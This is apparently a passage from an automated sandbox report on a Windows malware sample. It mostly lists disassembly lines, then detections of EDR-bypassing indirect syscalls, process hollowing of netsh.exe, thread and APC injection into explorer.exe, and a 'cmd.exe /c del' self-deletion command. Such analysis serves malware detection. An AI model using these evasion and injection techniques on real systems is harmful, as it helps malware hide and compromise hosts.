          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AB2D3 mov eax, dword ptr fs:[00000030h]3_2_013AB2D3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AB2D3 mov eax, dword ptr fs:[00000030h]3_2_013AB2D3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AB2D3 mov eax, dword ptr fs:[00000030h]3_2_013AB2D3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DF2D0 mov eax, dword ptr fs:[00000030h]3_2_013DF2D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DF2D0 mov eax, dword ptr fs:[00000030h]3_2_013DF2D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA2C3 mov eax, dword ptr fs:[00000030h]3_2_013BA2C3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA2C3 mov eax, dword ptr fs:[00000030h]3_2_013BA2C3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA2C3 mov eax, dword ptr fs:[00000030h]3_2_013BA2C3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA2C3 mov eax, dword ptr fs:[00000030h]3_2_013BA2C3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA2C3 mov eax, dword ptr fs:[00000030h]3_2_013BA2C3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB2C0 mov eax, dword ptr fs:[00000030h]3_2_013DB2C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB2C0 mov eax, dword ptr fs:[00000030h]3_2_013DB2C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB2C0 mov eax, dword ptr fs:[00000030h]3_2_013DB2C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB2C0 mov eax, dword ptr fs:[00000030h]3_2_013DB2C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB2C0 mov eax, dword ptr fs:[00000030h]3_2_013DB2C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB2C0 mov eax, dword ptr fs:[00000030h]3_2_013DB2C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB2C0 mov eax, dword ptr fs:[00000030h]3_2_013DB2C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B92C5 mov eax, dword ptr fs:[00000030h]3_2_013B92C5
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B92C5 mov eax, dword ptr fs:[00000030h]3_2_013B92C5
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014392BC mov eax, dword ptr fs:[00000030h]3_2_014392BC
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014392BC mov eax, dword ptr fs:[00000030h]3_2_014392BC
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014392BC mov ecx, dword ptr fs:[00000030h]3_2_014392BC
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014392BC mov ecx, dword ptr fs:[00000030h]3_2_014392BC
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DE53E mov eax, dword ptr fs:[00000030h]3_2_013DE53E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DE53E mov eax, dword ptr fs:[00000030h]3_2_013DE53E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DE53E mov eax, dword ptr fs:[00000030h]3_2_013DE53E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DE53E mov eax, dword ptr fs:[00000030h]3_2_013DE53E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DE53E mov eax, dword ptr fs:[00000030h]3_2_013DE53E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C0535 mov eax, dword ptr fs:[00000030h]3_2_013C0535
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C0535 mov eax, dword ptr fs:[00000030h]3_2_013C0535
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C0535 mov eax, dword ptr fs:[00000030h]3_2_013C0535
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C0535 mov eax, dword ptr fs:[00000030h]3_2_013C0535
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C0535 mov eax, dword ptr fs:[00000030h]3_2_013C0535
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C0535 mov eax, dword ptr fs:[00000030h]3_2_013C0535
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013ED530 mov eax, dword ptr fs:[00000030h]3_2_013ED530
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013ED530 mov eax, dword ptr fs:[00000030h]3_2_013ED530
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BD534 mov eax, dword ptr fs:[00000030h]3_2_013BD534
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BD534 mov eax, dword ptr fs:[00000030h]3_2_013BD534
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BD534 mov eax, dword ptr fs:[00000030h]3_2_013BD534
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BD534 mov eax, dword ptr fs:[00000030h]3_2_013BD534
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BD534 mov eax, dword ptr fs:[00000030h]3_2_013BD534
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BD534 mov eax, dword ptr fs:[00000030h]3_2_013BD534
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E7505 mov eax, dword ptr fs:[00000030h]3_2_013E7505
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E7505 mov ecx, dword ptr fs:[00000030h]3_2_013E7505
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01446500 mov eax, dword ptr fs:[00000030h]3_2_01446500
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01484500 mov eax, dword ptr fs:[00000030h]3_2_01484500
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01484500 mov eax, dword ptr fs:[00000030h]3_2_01484500
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01484500 mov eax, dword ptr fs:[00000030h]3_2_01484500
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01484500 mov eax, dword ptr fs:[00000030h]3_2_01484500
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01484500 mov eax, dword ptr fs:[00000030h]3_2_01484500
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01484500 mov eax, dword ptr fs:[00000030h]3_2_01484500
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01484500 mov eax, dword ptr fs:[00000030h]3_2_01484500
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EB570 mov eax, dword ptr fs:[00000030h]3_2_013EB570
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EB570 mov eax, dword ptr fs:[00000030h]3_2_013EB570
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E656A mov eax, dword ptr fs:[00000030h]3_2_013E656A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E656A mov eax, dword ptr fs:[00000030h]3_2_013E656A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E656A mov eax, dword ptr fs:[00000030h]3_2_013E656A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AB562 mov eax, dword ptr fs:[00000030h]3_2_013AB562
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145F525 mov eax, dword ptr fs:[00000030h]3_2_0145F525
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145F525 mov eax, dword ptr fs:[00000030h]3_2_0145F525
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145F525 mov eax, dword ptr fs:[00000030h]3_2_0145F525
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145F525 mov eax, dword ptr fs:[00000030h]3_2_0145F525
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145F525 mov eax, dword ptr fs:[00000030h]3_2_0145F525
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145F525 mov eax, dword ptr fs:[00000030h]3_2_0145F525
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145F525 mov eax, dword ptr fs:[00000030h]3_2_0145F525
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146B52F mov eax, dword ptr fs:[00000030h]3_2_0146B52F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B8550 mov eax, dword ptr fs:[00000030h]3_2_013B8550
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B8550 mov eax, dword ptr fs:[00000030h]3_2_013B8550
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01485537 mov eax, dword ptr fs:[00000030h]3_2_01485537
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014855C9 mov eax, dword ptr fs:[00000030h]3_2_014855C9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D45B1 mov eax, dword ptr fs:[00000030h]3_2_013D45B1
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D45B1 mov eax, dword ptr fs:[00000030h]3_2_013D45B1
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DF5B0 mov eax, dword ptr fs:[00000030h]3_2_013DF5B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DF5B0 mov eax, dword ptr fs:[00000030h]3_2_013DF5B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DF5B0 mov eax, dword ptr fs:[00000030h]3_2_013DF5B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DF5B0 mov eax, dword ptr fs:[00000030h]3_2_013DF5B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DF5B0 mov eax, dword ptr fs:[00000030h]3_2_013DF5B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DF5B0 mov eax, dword ptr fs:[00000030h]3_2_013DF5B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DF5B0 mov eax, dword ptr fs:[00000030h]3_2_013DF5B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DF5B0 mov eax, dword ptr fs:[00000030h]3_2_013DF5B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DF5B0 mov eax, dword ptr fs:[00000030h]3_2_013DF5B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0142D5D0 mov eax, dword ptr fs:[00000030h]3_2_0142D5D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0142D5D0 mov ecx, dword ptr fs:[00000030h]3_2_0142D5D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D15A9 mov eax, dword ptr fs:[00000030h]3_2_013D15A9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D15A9 mov eax, dword ptr fs:[00000030h]3_2_013D15A9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D15A9 mov eax, dword ptr fs:[00000030h]3_2_013D15A9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D15A9 mov eax, dword ptr fs:[00000030h]3_2_013D15A9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D15A9 mov eax, dword ptr fs:[00000030h]3_2_013D15A9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014835D7 mov eax, dword ptr fs:[00000030h]3_2_014835D7
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014835D7 mov eax, dword ptr fs:[00000030h]3_2_014835D7
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014835D7 mov eax, dword ptr fs:[00000030h]3_2_014835D7
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EE59C mov eax, dword ptr fs:[00000030h]3_2_013EE59C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A758F mov eax, dword ptr fs:[00000030h]3_2_013A758F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A758F mov eax, dword ptr fs:[00000030h]3_2_013A758F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A758F mov eax, dword ptr fs:[00000030h]3_2_013A758F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E4588 mov eax, dword ptr fs:[00000030h]3_2_013E4588
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B2582 mov eax, dword ptr fs:[00000030h]3_2_013B2582
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B2582 mov ecx, dword ptr fs:[00000030h]3_2_013B2582
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D15F4 mov eax, dword ptr fs:[00000030h]3_2_013D15F4
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D15F4 mov eax, dword ptr fs:[00000030h]3_2_013D15F4
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D15F4 mov eax, dword ptr fs:[00000030h]3_2_013D15F4
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D15F4 mov eax, dword ptr fs:[00000030h]3_2_013D15F4
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D15F4 mov eax, dword ptr fs:[00000030h]3_2_013D15F4
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D15F4 mov eax, dword ptr fs:[00000030h]3_2_013D15F4
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EC5ED mov eax, dword ptr fs:[00000030h]3_2_013EC5ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EC5ED mov eax, dword ptr fs:[00000030h]3_2_013EC5ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143B594 mov eax, dword ptr fs:[00000030h]3_2_0143B594
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143B594 mov eax, dword ptr fs:[00000030h]3_2_0143B594
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DE5E7 mov eax, dword ptr fs:[00000030h]3_2_013DE5E7
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DE5E7 mov eax, dword ptr fs:[00000030h]3_2_013DE5E7
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DE5E7 mov eax, dword ptr fs:[00000030h]3_2_013DE5E7
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DE5E7 mov eax, dword ptr fs:[00000030h]3_2_013DE5E7
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DE5E7 mov eax, dword ptr fs:[00000030h]3_2_013DE5E7
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DE5E7 mov eax, dword ptr fs:[00000030h]3_2_013DE5E7
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DE5E7 mov eax, dword ptr fs:[00000030h]3_2_013DE5E7
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DE5E7 mov eax, dword ptr fs:[00000030h]3_2_013DE5E7
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B25E0 mov eax, dword ptr fs:[00000030h]3_2_013B25E0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014305A7 mov eax, dword ptr fs:[00000030h]3_2_014305A7
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014305A7 mov eax, dword ptr fs:[00000030h]3_2_014305A7
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014305A7 mov eax, dword ptr fs:[00000030h]3_2_014305A7
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D95DA mov eax, dword ptr fs:[00000030h]3_2_013D95DA
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B65D0 mov eax, dword ptr fs:[00000030h]3_2_013B65D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EA5D0 mov eax, dword ptr fs:[00000030h]3_2_013EA5D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EA5D0 mov eax, dword ptr fs:[00000030h]3_2_013EA5D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EE5CF mov eax, dword ptr fs:[00000030h]3_2_013EE5CF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EE5CF mov eax, dword ptr fs:[00000030h]3_2_013EE5CF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0144D5B0 mov eax, dword ptr fs:[00000030h]3_2_0144D5B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0144D5B0 mov eax, dword ptr fs:[00000030h]3_2_0144D5B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146F5BE mov eax, dword ptr fs:[00000030h]3_2_0146F5BE
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014435BA mov eax, dword ptr fs:[00000030h]3_2_014435BA
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014435BA mov eax, dword ptr fs:[00000030h]3_2_014435BA
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014435BA mov eax, dword ptr fs:[00000030h]3_2_014435BA
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014435BA mov eax, dword ptr fs:[00000030h]3_2_014435BA
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E55C0 mov eax, dword ptr fs:[00000030h]3_2_013E55C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146F453 mov eax, dword ptr fs:[00000030h]3_2_0146F453
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AE420 mov eax, dword ptr fs:[00000030h]3_2_013AE420
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AE420 mov eax, dword ptr fs:[00000030h]3_2_013AE420
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AE420 mov eax, dword ptr fs:[00000030h]3_2_013AE420
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AC427 mov eax, dword ptr fs:[00000030h]3_2_013AC427
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143C460 mov ecx, dword ptr fs:[00000030h]3_2_0143C460
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D340D mov eax, dword ptr fs:[00000030h]3_2_013D340D
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0148547F mov eax, dword ptr fs:[00000030h]3_2_0148547F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E8402 mov eax, dword ptr fs:[00000030h]3_2_013E8402
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E8402 mov eax, dword ptr fs:[00000030h]3_2_013E8402
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E8402 mov eax, dword ptr fs:[00000030h]3_2_013E8402
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DA470 mov eax, dword ptr fs:[00000030h]3_2_013DA470
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DA470 mov eax, dword ptr fs:[00000030h]3_2_013DA470
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DA470 mov eax, dword ptr fs:[00000030h]3_2_013DA470
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01437410 mov eax, dword ptr fs:[00000030h]3_2_01437410
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B1460 mov eax, dword ptr fs:[00000030h]3_2_013B1460
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B1460 mov eax, dword ptr fs:[00000030h]3_2_013B1460
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B1460 mov eax, dword ptr fs:[00000030h]3_2_013B1460
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B1460 mov eax, dword ptr fs:[00000030h]3_2_013B1460
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B1460 mov eax, dword ptr fs:[00000030h]3_2_013B1460
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CF460 mov eax, dword ptr fs:[00000030h]3_2_013CF460
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CF460 mov eax, dword ptr fs:[00000030h]3_2_013CF460
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CF460 mov eax, dword ptr fs:[00000030h]3_2_013CF460
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CF460 mov eax, dword ptr fs:[00000030h]3_2_013CF460
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CF460 mov eax, dword ptr fs:[00000030h]3_2_013CF460
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CF460 mov eax, dword ptr fs:[00000030h]3_2_013CF460
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01436420 mov eax, dword ptr fs:[00000030h]3_2_01436420
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01436420 mov eax, dword ptr fs:[00000030h]3_2_01436420
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01436420 mov eax, dword ptr fs:[00000030h]3_2_01436420
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01436420 mov eax, dword ptr fs:[00000030h]3_2_01436420
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01436420 mov eax, dword ptr fs:[00000030h]3_2_01436420
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_01564068 GetProcessHeap,HeapFree,6_2_01564068
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_015696E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_015696E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_01569930 SetUnhandledExceptionFilter,6_2_01569930
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeNtQueueApcThread: Indirect: 0x131A4F2Jump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeNtClose: Indirect: 0x131A56C
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeMemory written: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 2580Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1560000Jump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess created: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"Jump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess created: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"Jump to behavior
          Source: explorer.exe, 00000004.00000000.1702259506.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1703558154.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4141580919.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.1702259506.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4141580919.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.1701959899.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4141036678.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
